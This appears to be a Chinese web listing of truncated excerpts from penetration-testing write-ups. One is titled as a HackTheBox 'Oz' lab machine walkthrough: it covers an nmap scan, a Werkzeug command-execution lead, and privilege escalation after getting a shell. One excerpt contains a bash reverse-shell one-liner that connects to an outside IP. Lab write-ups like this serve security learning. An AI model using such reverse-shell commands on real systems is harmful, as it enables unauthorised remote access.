上面说到,我们拿下了shell,但是感觉不是那么简单。果然。不是root权限。那就来提权吧。bash -i >& /dev/tcp/192.168.3.251/4567 0>&am...
【技术文章】hackthebox Oz靶机渗透
信息收集nmap -A -v -sC 10.10.10.96我们可以看到80、8080有一个werkzeug,查了一下是一个WSGI的工具包。好像还有个命令执行的漏洞,我们可以针对这个找脚本试一下PO...
5